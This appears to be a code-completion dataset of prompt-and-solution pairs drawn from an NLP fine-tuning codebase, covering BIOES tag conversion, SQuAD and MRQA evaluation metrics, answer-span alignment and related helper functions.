The provided code snippet includes necessary dependencies for implementing the `print_tokens` function. Write a Python function `def print_tokens(inputs: Inputs, inv_vocab, updates_mask=None)` to solve the following problem:
Pretty-print model inputs.
Here is the function:
def print_tokens(inputs: Inputs, inv_vocab, updates_mask=None):
  """Pretty-print model inputs (first example of the batch only)."""
  # Map each masked position to its original token id; weight 0 entries
  # are padding in the masked-LM arrays and are skipped.
  pos_to_tokid = {}
  for tokid, pos, weight in zip(
      inputs.masked_lm_ids[0], inputs.masked_lm_positions[0],
      inputs.masked_lm_weights[0]):
    if weight == 0:
      pass
    else:
      pos_to_tokid[pos] = tokid
  text = ""
  provided_update_mask = (updates_mask is not None)
  if not provided_update_mask:
    updates_mask = np.zeros_like(inputs.input_ids)
  for pos, (tokid, um) in enumerate(
      zip(inputs.input_ids[0], updates_mask[0])):
    token = inv_vocab[tokid]
    if token == "[PAD]":
      break
    if pos in pos_to_tokid:
      # Masked positions print in red with the original token in parens.
      token = RED + token + " (" + inv_vocab[pos_to_tokid[pos]] + ")" + ENDC
      if provided_update_mask:
        assert um == 1
    else:
      if provided_update_mask:
        assert um == 0
    text += token + " "
  utils.log(tokenization.printable_text(text))
6,174 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
The provided code snippet includes necessary dependencies for implementing the `get_span_labels` function. Write a Python function `def get_span_labels(sentence_tags, inv_label_mapping=None)` to solve the following problem:
Go from token-level labels to list of entities (start, end, class).
Here is the function:
def get_span_labels(sentence_tags, inv_label_mapping=None):
  """Go from token-level labels to list of entities (start, end, class)."""
  if inv_label_mapping:
    sentence_tags = [inv_label_mapping[t] for t in sentence_tags]
  spans = []
  prev_tag = 'O'
  span_start = -1
  for idx, tag in enumerate(sentence_tags):
    if tag == 'O':
      prefix = None
    else:
      prefix, _ = tag.split('-')
    # A span ends right before an S/B prefix or an O tag.
    if prev_tag != 'O' and (prefix == 'S' or prefix == 'B' or tag == 'O'):
      spans.append((span_start, idx - 1, prev_tag.split('-')[-1]))
    # A span starts at S/B, or at any tag that follows an O.
    if prefix == 'B' or prefix == 'S' or prev_tag == 'O':
      span_start = idx
    prev_tag = tag
  if sentence_tags[-1] != 'O':
    spans.append((span_start, len(sentence_tags) - 1,
                  sentence_tags[-1].split('-')[-1]))
  return spans
6,175 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
The provided code snippet includes necessary dependencies for implementing the `get_tags` function. Write a Python function `def get_tags(span_labels, length, encoding)` to solve the following problem:
Converts a list of entities to token-level labels based on the provided encoding (e.g., BIOES).
Here is the function:
def get_tags(span_labels, length, encoding):
  """Converts a list of entities (start, end, class) back to token-level
  tags under the given encoding scheme (e.g., BIOES).
  """
  tags = ['O'] * length
  for start, end, label in span_labels:
    # Fill the whole span as inside, then overwrite the boundary tokens
    # according to which letters the encoding supports.
    for pos in range(start, end + 1):
      tags[pos] = 'I-' + label
    if 'E' in encoding:
      tags[end] = 'E-' + label
    if 'B' in encoding:
      tags[start] = 'B-' + label
    if 'S' in encoding and start == end:
      tags[start] = 'S-' + label
  return tags
6,176 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.tagging import tagging_metrics
from finetune.tagging import tagging_utils
from model import tokenization
from pretrain import pretrain_helpers
from util import utils
The provided code snippet includes necessary dependencies for implementing the `tokenize_and_align` function. Write a Python function `def tokenize_and_align(tokenizer, words, cased=False)` to solve the following problem:
Splits up words into subword-level tokens.
Here is the function:
def tokenize_and_align(tokenizer, words, cased=False):
  """Splits up words into subword-level tokens.

  The result is grouped per original word (plus the added [CLS]/[SEP])
  so token-level labels can be aligned back to their source word.
  """
  words = ["[CLS]"] + list(words) + ["[SEP]"]
  basic_tokenizer = tokenizer.basic_tokenizer
  tokenized_words = []
  for word in words:
    word = tokenization.convert_to_unicode(word)
    word = basic_tokenizer._clean_text(word)
    if word == "[CLS]" or word == "[SEP]":
      word_toks = [word]
    else:
      if not cased:
        word = word.lower()
        word = basic_tokenizer._run_strip_accents(word)
      word_toks = basic_tokenizer._run_split_on_punc(word)
    # Wordpiece each punctuation-split chunk; chunks stay grouped per word.
    tokenized_word = []
    for word_tok in word_toks:
      tokenized_word += tokenizer.wordpiece_tokenizer.tokenize(word_tok)
    tokenized_words.append(tokenized_word)
  assert len(tokenized_words) == len(words)
  return tokenized_words
6,177 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def parse_args():
  """Build and parse the CLI flags for standalone SQuAD 2.0 evaluation.

  Prints help and exits with status 1 when invoked with no arguments.
  """
  parser = argparse.ArgumentParser('Official evaluation script for SQuAD version 2.0.')
  parser.add_argument('data_file', metavar='data.json', help='Input data JSON file.')
  parser.add_argument('pred_file', metavar='pred.json', help='Model predictions.')
  parser.add_argument('--out-file', '-o', metavar='eval.json',
                      help='Write accuracy metrics to file (default is stdout).')
  parser.add_argument('--na-prob-file', '-n', metavar='na_prob.json',
                      help='Model estimates of probability of no answer.')
  parser.add_argument('--na-prob-thresh', '-t', type=float, default=1.0,
                      help='Predict "" if no-answer probability exceeds this (default = 1.0).')
  parser.add_argument('--out-image-dir', '-p', metavar='out_images', default=None,
                      help='Save precision-recall curves to directory.')
  parser.add_argument('--verbose', '-v', action='store_true')
  if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)
  return parser.parse_args()
6,178 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
OPTS = None
def set_opts(config: configure_finetuning.FinetuningConfig, split):
  """Populate the module-level OPTS from a finetuning config.

  Mirrors the command-line options of the official SQuAD eval script so
  the rest of the module can run without argparse.
  """
  global OPTS
  Options = collections.namedtuple("Options", [
      "data_file", "pred_file", "out_file", "na_prob_file", "na_prob_thresh",
      "out_image_dir", "verbose"])
  OPTS = Options(
      data_file=os.path.join(
          config.raw_data_dir("squad"),
          split + ("-debug" if config.debug else "") + ".json"),
      pred_file=config.qa_preds_file("squad"),
      out_file=config.qa_eval_file("squad"),
      na_prob_file=config.qa_na_file("squad"),
      na_prob_thresh=config.qa_na_threshold,
      out_image_dir=None,
      verbose=False
  )
6,179 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def make_qid_to_has_ans(dataset):
  """Map each question id to whether it has at least one gold answer."""
  return {
      qa['id']: bool(qa['answers'])
      for article in dataset
      for paragraph in article['paragraphs']
      for qa in paragraph['qas']
  }
6,180 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def normalize_answer(s):
  """Lower text and remove punctuation, articles and extra whitespace."""
  # Order matters: lowercase, strip punctuation, drop articles, then
  # collapse whitespace (article removal leaves gaps behind).
  lowered = s.lower()
  punctuation = set(string.punctuation)
  no_punc = ''.join(ch for ch in lowered if ch not in punctuation)
  no_articles = re.sub(r'\b(a|an|the)\b', ' ', no_punc)
  return ' '.join(no_articles.split())
def compute_exact(a_gold, a_pred):
  """1 if the normalized prediction equals the normalized gold answer, else 0."""
  return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
  """Token-level F1 between the gold answer and the prediction.

  Tokens come from get_tokens (normalized whitespace split); overlap is
  counted with Counter intersection so duplicates are handled correctly.
  """
  gold_toks = get_tokens(a_gold)
  pred_toks = get_tokens(a_pred)
  common = collections.Counter(gold_toks) & collections.Counter(pred_toks)
  num_same = sum(common.values())
  if len(gold_toks) == 0 or len(pred_toks) == 0:
    # If either is no-answer, then F1 is 1 if they agree, 0 otherwise
    return int(gold_toks == pred_toks)
  if num_same == 0:
    return 0
  precision = 1.0 * num_same / len(pred_toks)
  recall = 1.0 * num_same / len(gold_toks)
  f1 = (2 * precision * recall) / (precision + recall)
  return f1
def get_raw_scores(dataset, preds):
  """Compute per-question exact-match and F1 scores.

  Returns two dicts keyed by question id. Questions missing from preds
  are reported and skipped; unanswerable questions are scored against
  the empty string.
  """
  exact_scores = {}
  f1_scores = {}
  for article in dataset:
    for p in article['paragraphs']:
      for qa in p['qas']:
        qid = qa['id']
        # Drop gold answers that normalize to nothing (punctuation-only).
        gold_answers = [a['text'] for a in qa['answers']
                        if normalize_answer(a['text'])]
        if not gold_answers:
          # For unanswerable questions, only correct answer is empty string
          gold_answers = ['']
        if qid not in preds:
          print('Missing prediction for %s' % qid)
          continue
        a_pred = preds[qid]
        # Take max over all gold answers
        exact_scores[qid] = max(compute_exact(a, a_pred) for a in gold_answers)
        f1_scores[qid] = max(compute_f1(a, a_pred) for a in gold_answers)
  return exact_scores, f1_scores
6,181 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def apply_no_ans_threshold(scores, na_probs, qid_to_has_ans, na_prob_thresh):
  """Overwrite scores where the no-answer probability exceeds the threshold.

  When na_probs[qid] > na_prob_thresh the prediction is treated as "no
  answer": the score becomes 1.0 for genuinely unanswerable questions
  and 0.0 otherwise. All other scores pass through unchanged.
  """
  adjusted = {}
  for qid, score in scores.items():
    if na_probs[qid] > na_prob_thresh:
      adjusted[qid] = float(not qid_to_has_ans[qid])
    else:
      adjusted[qid] = score
  return adjusted
6,182 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def make_eval_dict(exact_scores, f1_scores, qid_list=None):
  """Aggregate per-question scores into exact/f1 percentages.

  With a non-empty qid_list the averages cover only those question ids;
  otherwise every entry in exact_scores is used.
  """
  if qid_list:
    total = len(qid_list)
    exact_sum = sum(exact_scores[qid] for qid in qid_list)
    f1_sum = sum(f1_scores[qid] for qid in qid_list)
  else:
    total = len(exact_scores)
    exact_sum = sum(exact_scores.values())
    f1_sum = sum(f1_scores.values())
  return collections.OrderedDict([
      ('exact', 100.0 * exact_sum / total),
      ('f1', 100.0 * f1_sum / total),
      ('total', total),
  ])
6,183 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def merge_eval(main_eval, new_eval, prefix):
  """Copy every metric from new_eval into main_eval under 'prefix_<key>'."""
  for key, value in new_eval.items():
    main_eval['%s_%s' % (prefix, key)] = value
def make_precision_recall_eval(scores, na_probs, num_true_pos, qid_to_has_ans,
                               out_image=None, title=None):
  """Sweep the no-answer threshold and compute average precision.

  Walks qids in order of increasing no-answer probability, treating each
  distinct probability value as a candidate threshold, and accumulates the
  area under the precision-recall curve. Optionally plots the curve.

  Returns:
    {'ap': average precision as a percentage}
  """
  ordered_qids = sorted(na_probs, key=na_probs.get)
  precisions, recalls = [1.0], [0.0]
  true_pos = 0.0
  avg_prec = 0.0
  for rank, qid in enumerate(ordered_qids):
    if qid_to_has_ans[qid]:
      true_pos += scores[qid]
    cur_p = true_pos / float(rank + 1)
    cur_r = true_pos / float(num_true_pos)
    is_last = rank == len(ordered_qids) - 1
    if is_last or na_probs[qid] != na_probs[ordered_qids[rank + 1]]:
      # A threshold can be placed after this qid, so record the point.
      avg_prec += cur_p * (cur_r - recalls[-1])
      precisions.append(cur_p)
      recalls.append(cur_r)
  if out_image:
    plot_pr_curve(precisions, recalls, out_image, title)
  return {'ap': 100.0 * avg_prec}
def run_precision_recall_analysis(main_eval, exact_raw, f1_raw, na_probs,
                                  qid_to_has_ans, out_image_dir):
  """Compute PR-curve average precision for exact, F1, and oracle scores.

  Writes one PR-curve image per metric into out_image_dir (created if
  missing) and merges each resulting 'ap' value into main_eval. Does
  nothing when the dataset contains no answerable question.
  """
  if out_image_dir and not os.path.exists(out_image_dir):
    os.makedirs(out_image_dir)
  num_true_pos = sum(1 for has_ans in qid_to_has_ans.values() if has_ans)
  if not num_true_pos:
    return
  # The oracle scores a question 1.0 iff it is answerable: an upper bound
  # on what thresholding the no-answer probability could achieve.
  oracle_scores = {qid: float(has) for qid, has in qid_to_has_ans.items()}
  curve_specs = [
      (exact_raw, 'pr_exact.png',
       'Precision-Recall curve for Exact Match score', 'pr_exact'),
      (f1_raw, 'pr_f1.png',
       'Precision-Recall curve for F1 score', 'pr_f1'),
      (oracle_scores, 'pr_oracle.png',
       'Oracle Precision-Recall curve (binary task of HasAns vs. NoAns)',
       'pr_oracle'),
  ]
  for raw_scores, fname, title, prefix in curve_specs:
    pr_eval = make_precision_recall_eval(
        raw_scores, na_probs, num_true_pos, qid_to_has_ans,
        out_image=os.path.join(out_image_dir, fname), title=title)
    merge_eval(main_eval, pr_eval, prefix)
6,184 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def histogram_na_prob(na_probs, qid_list, image_dir, name):
  """Save a histogram of the model's no-answer probabilities.

  Plots the distribution of na_probs over the qids in qid_list, weighted so
  the bars sum to 1, and writes it to image_dir as
  'na_prob_hist_<name>.png'. Does nothing when qid_list is empty.

  NOTE(review): relies on a module-level `plt` (presumably
  matplotlib.pyplot) that is not among the imports shown here -- confirm it
  is imported elsewhere in this module.
  """
  if not qid_list:
    return
  x = [na_probs[k] for k in qid_list]
  # One uniform weight per sample so the histogram shows proportions,
  # not raw counts.
  weights = np.ones_like(x) / float(len(x))
  plt.hist(x, weights=weights, bins=20, range=(0.0, 1.0))
  plt.xlabel('Model probability of no-answer')
  plt.ylabel('Proportion of dataset')
  plt.title('Histogram of no-answer probability: %s' % name)
  plt.savefig(os.path.join(image_dir, 'na_prob_hist_%s.png' % name))
  # Clear the figure so later plots do not stack on top of this one.
  plt.clf()
6,185 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import numpy as np
import os
import re
import string
import sys
import tensorflow.compat.v1 as tf
import configure_finetuning
def find_best_thresh(preds, scores, na_probs, qid_to_has_ans):
  """Find the no-answer probability threshold maximizing the given score.

  Starts from the score obtained by predicting "no answer" for everything,
  then sweeps qids in order of increasing no-answer probability, flipping
  each to "answered" and tracking the best running total.

  Returns:
    (best score as a percentage of len(scores), best threshold)
  """
  running = sum(1 for qid in qid_to_has_ans if not qid_to_has_ans[qid])
  best_score, best_thresh = running, 0.0
  for qid in sorted(na_probs, key=na_probs.get):
    if qid not in scores:
      continue
    if qid_to_has_ans[qid]:
      delta = scores[qid]
    elif preds[qid]:
      # Answerable prediction for an unanswerable question: lose a point.
      delta = -1
    else:
      delta = 0
    running += delta
    if running > best_score:
      best_score, best_thresh = running, na_probs[qid]
  return 100.0 * best_score / len(scores), best_thresh
def find_all_best_thresh(main_eval, preds, exact_raw, f1_raw, na_probs, qid_to_has_ans):
  """Record the best achievable exact/F1 scores and their thresholds."""
  for metric, raw_scores in (('exact', exact_raw), ('f1', f1_raw)):
    best_score, best_thresh = find_best_thresh(
        preds, raw_scores, na_probs, qid_to_has_ans)
    main_eval['best_%s' % metric] = best_score
    main_eval['best_%s_thresh' % metric] = best_thresh
6,186 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_check_is_max_context` function. Write a Python function `def _check_is_max_context(doc_spans, cur_span_index, position)` to solve the following problem:
Check if this is the 'max context' doc span for the token.
Here is the function:
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index | Check if this is the 'max context' doc span for the token. |
6,187 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_improve_answer_span` function. Write a Python function `def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer, orig_answer_text)` to solve the following problem:
Returns tokenized answer spans that better match the annotated answer.
Here is the function:
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return new_start, new_end
return input_start, input_end | Returns tokenized answer spans that better match the annotated answer. |
6,188 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import json
import os
import six
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.qa import qa_metrics
from model import modeling
from model import tokenization
from util import utils
def is_whitespace(c):
  """True for the whitespace characters treated as token boundaries.

  Covers space, tab, CR, LF, and U+202F (narrow no-break space).
  """
  return c in (" ", "\t", "\r", "\n") or ord(c) == 0x202F
6,189 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_get_best_indexes` function. Write a Python function `def _get_best_indexes(logits, n_best_size)` to solve the following problem:
Get the n-best logits from a list.
Here is the function:
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes | Get the n-best logits from a list. |
6,190 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_compute_softmax` function. Write a Python function `def _compute_softmax(scores)` to solve the following problem:
Compute softmax probability over raw logits.
Here is the function:
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = np.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs | Compute softmax probability over raw logits. |
6,191 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
import six
import configure_finetuning
from finetune import scorer
from finetune.qa import mrqa_official_eval
from finetune.qa import squad_official_eval
from finetune.qa import squad_official_eval_v1
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_final_text` function. Write a Python function `def get_final_text(config: configure_finetuning.FinetuningConfig, pred_text, orig_text)` to solve the following problem:
Project the tokenized prediction back to the original text.
Here is the function:
def get_final_text(config: configure_finetuning.FinetuningConfig, pred_text,
                   orig_text):
  """Project the tokenized prediction back to the original text.

  Args:
    config: fine-tuning config; uses `do_lower_case` for the tokenizer and
      `debug` to enable logging of alignment failures.
    pred_text: predicted answer text after tokenization/normalization.
    orig_text: span of the original document text covering the prediction.

  Returns:
    The sub-span of `orig_text` aligned to `pred_text`, or `orig_text`
    unchanged whenever the alignment heuristic fails.
  """
  # When we created the data, we kept track of the alignment between original
  # (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
  # now `orig_text` contains the span of our original text corresponding to the
  # span that we predicted.
  #
  # However, `orig_text` may contain extra characters that we don't want in
  # our prediction.
  #
  # For example, let's say:
  #   pred_text = steve smith
  #   orig_text = Steve Smith's
  #
  # We don't want to return `orig_text` because it contains the extra "'s".
  #
  # We don't want to return `pred_text` because it's already been normalized
  # (the SQuAD eval script also does punctuation stripping/lower casing but
  # our tokenizer does additional normalization like stripping accent
  # characters).
  #
  # What we really want to return is "Steve Smith".
  #
  # Therefore, we have to apply a semi-complicated alignment heuristic between
  # `pred_text` and `orig_text` to get a character-to-character alignment. This
  # can fail in certain cases in which case we just return `orig_text`.
  def _strip_spaces(text):
    """Remove spaces; also map each stripped index to its original index."""
    ns_chars = []
    ns_to_s_map = collections.OrderedDict()
    for i, c in enumerate(text):
      if c == " ":
        continue
      ns_to_s_map[len(ns_chars)] = i
      ns_chars.append(c)
    ns_text = "".join(ns_chars)
    return ns_text, dict(ns_to_s_map)
  # We first tokenize `orig_text`, strip whitespace from the result
  # and `pred_text`, and check if they are the same length. If they are
  # NOT the same length, the heuristic has failed. If they are the same
  # length, we assume the characters are one-to-one aligned.
  tokenizer = tokenization.BasicTokenizer(do_lower_case=config.do_lower_case)
  tok_text = " ".join(tokenizer.tokenize(orig_text))
  start_position = tok_text.find(pred_text)
  if start_position == -1:
    if config.debug:
      utils.log(
          "Unable to find text: '%s' in '%s'" % (pred_text, orig_text))
    return orig_text
  end_position = start_position + len(pred_text) - 1
  (orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
  (tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
  if len(orig_ns_text) != len(tok_ns_text):
    if config.debug:
      utils.log("Length not equal after stripping spaces: '%s' vs '%s'",
                orig_ns_text, tok_ns_text)
    return orig_text
  # We then project the characters in `pred_text` back to `orig_text` using
  # the character-to-character alignment.
  tok_s_to_ns_map = {}
  for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
    tok_s_to_ns_map[tok_index] = i
  orig_start_position = None
  if start_position in tok_s_to_ns_map:
    ns_start_position = tok_s_to_ns_map[start_position]
    if ns_start_position in orig_ns_to_s_map:
      orig_start_position = orig_ns_to_s_map[ns_start_position]
  if orig_start_position is None:
    if config.debug:
      utils.log("Couldn't map start position")
    return orig_text
  orig_end_position = None
  if end_position in tok_s_to_ns_map:
    ns_end_position = tok_s_to_ns_map[end_position]
    if ns_end_position in orig_ns_to_s_map:
      orig_end_position = orig_ns_to_s_map[ns_end_position]
  if orig_end_position is None:
    if config.debug:
      utils.log("Couldn't map end position")
    return orig_text
  output_text = orig_text[orig_start_position:(orig_end_position + 1)]
  return output_text
6,192 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def read_predictions(prediction_file):
  """Load a JSON file mapping qid -> predicted answer text."""
  with tf.io.gfile.GFile(prediction_file) as f:
    return json.load(f)
6,193 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def read_answers(gold_file):
  """Load gold answers from a JSON-lines file, keyed by qid.

  Skips an optional 'header' record on the first line.
  """
  answers = {}
  with tf.io.gfile.GFile(gold_file, 'r') as f:
    for line_no, line in enumerate(f):
      record = json.loads(line)
      if line_no == 0 and 'header' in record:
        continue
      for qa in record['qas']:
        answers[qa['qid']] = qa['answers']
  return answers
6,194 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import string
import re
import json
import tensorflow.compat.v1 as tf
from collections import Counter
import configure_finetuning
def f1_score(prediction, ground_truth):
  """Token-level F1 between the normalized prediction and ground truth."""
  pred_tokens = normalize_answer(prediction).split()
  truth_tokens = normalize_answer(ground_truth).split()
  # Multiset intersection counts each shared token at most as often as it
  # appears in both answers.
  overlap = Counter(pred_tokens) & Counter(truth_tokens)
  num_same = sum(overlap.values())
  if num_same == 0:
    return 0
  precision = 1.0 * num_same / len(pred_tokens)
  recall = 1.0 * num_same / len(truth_tokens)
  return (2 * precision * recall) / (precision + recall)
def exact_match_score(prediction, ground_truth):
  """True iff prediction and ground truth are equal after normalization."""
  return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
  """Best metric value of the prediction against any single ground truth."""
  return max(metric_fn(prediction, gt) for gt in ground_truths)
def evaluate(answers, predictions, skip_no_answer=False):
  """Aggregate exact-match and F1 percentages over all gold questions.

  A qid missing from predictions scores 0 and is warned about, unless
  skip_no_answer is set, in which case it is excluded from the
  denominator entirely.
  """
  f1 = exact_match = total = 0
  for qid, ground_truths in answers.items():
    if qid not in predictions:
      if not skip_no_answer:
        print('Unanswered question %s will receive score 0.' % qid)
        total += 1
      continue
    total += 1
    prediction = predictions[qid]
    exact_match += metric_max_over_ground_truths(
        exact_match_score, prediction, ground_truths)
    f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths)
  return {'exact_match': 100.0 * exact_match / total,
          'f1': 100.0 * f1 / total}
6,195 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import Counter
import string
import re
import json
import sys
import os
import collections
import tensorflow.compat.v1 as tf
import configure_finetuning
def f1_score(prediction, ground_truth):
  """Harmonic mean of token precision and recall after normalization."""
  p_toks = normalize_answer(prediction).split()
  g_toks = normalize_answer(ground_truth).split()
  shared = sum((Counter(p_toks) & Counter(g_toks)).values())
  if shared == 0:
    return 0
  precision = 1.0 * shared / len(p_toks)
  recall = 1.0 * shared / len(g_toks)
  return (2 * precision * recall) / (precision + recall)
def exact_match_score(prediction, ground_truth):
  """Exact string equality of the normalized prediction and ground truth."""
  return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
  """Score the prediction against every ground truth; return the maximum."""
  return max(metric_fn(prediction, truth) for truth in ground_truths)
def evaluate(dataset, predictions):
  """Corpus-level exact-match and F1 over a SQuAD-style dataset.

  Questions missing from predictions are warned about on stderr and score
  0 (they still count toward the denominator).
  """
  f1 = exact_match = total = 0
  for article in dataset:
    for paragraph in article['paragraphs']:
      for qa in paragraph['qas']:
        total += 1
        qid = qa['id']
        if qid not in predictions:
          message = 'Unanswered question ' + qid + \
                    ' will receive score 0.'
          print(message, file=sys.stderr)
          continue
        ground_truths = [answer['text'] for answer in qa['answers']]
        prediction = predictions[qid]
        exact_match += metric_max_over_ground_truths(
            exact_match_score, prediction, ground_truths)
        f1 += metric_max_over_ground_truths(
            f1_score, prediction, ground_truths)
  return {'exact_match': 100.0 * exact_match / total,
          'f1': 100.0 * f1 / total}
6,196 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import csv
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.classification import classification_metrics
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `_truncate_seq_pair` function. Write a Python function `def _truncate_seq_pair(tokens_a, tokens_b, max_length)` to solve the following problem:
Truncates a sequence pair in place to the maximum length.
Here is the function:
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop() | Truncates a sequence pair in place to the maximum length. |
6,197 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import csv
import os
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import feature_spec
from finetune import task
from finetune.classification import classification_metrics
from model import tokenization
from util import utils
The provided code snippet includes necessary dependencies for implementing the `read_tsv` function. Write a Python function `def read_tsv(input_file, quotechar=None, max_lines=None)` to solve the following problem:
Reads a tab separated value file.
Here is the function:
def read_tsv(input_file, quotechar=None, max_lines=None):
  """Reads a tab separated value file.

  Returns at most max_lines rows (all rows when max_lines is falsy),
  each as a list of column strings.
  """
